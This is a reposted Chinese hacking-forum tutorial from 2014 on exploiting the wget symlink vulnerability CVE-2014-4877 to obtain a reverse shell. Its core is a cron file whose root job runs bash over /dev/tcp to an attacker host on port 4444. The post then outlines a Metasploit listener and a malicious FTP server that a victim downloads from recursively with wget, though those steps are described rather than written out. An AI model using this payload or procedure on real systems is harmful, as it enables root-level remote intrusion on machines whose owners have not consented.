搜索
查看: 830|回复: 1

【转载】利用wget漏洞(CVE-2014-4877)反弹shell

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-10-31 12:01:31 | 显示全部楼层 |阅读模式

28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。

攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起来看看怎么利用wget漏洞获得交互式的shell吧。

首先我们先建立一个计划任务文件,文件内容是反弹一个交互式的shell到本机。

  1. cat>cronshell <<EOD
  2. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  3. * * * * * root bash -c '<&112-;exec 112<>/dev/tcp/ 192.168.220.128/4444;sh <&112 >&112 2>&112'                             
  4. EOD
复制代码

然后,我们利用msf监听本地端口。

搭建一个攻击ftp

下面我用一台centos递归下载ftp上的内容。

可以看到,我们已经获得了session。

过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表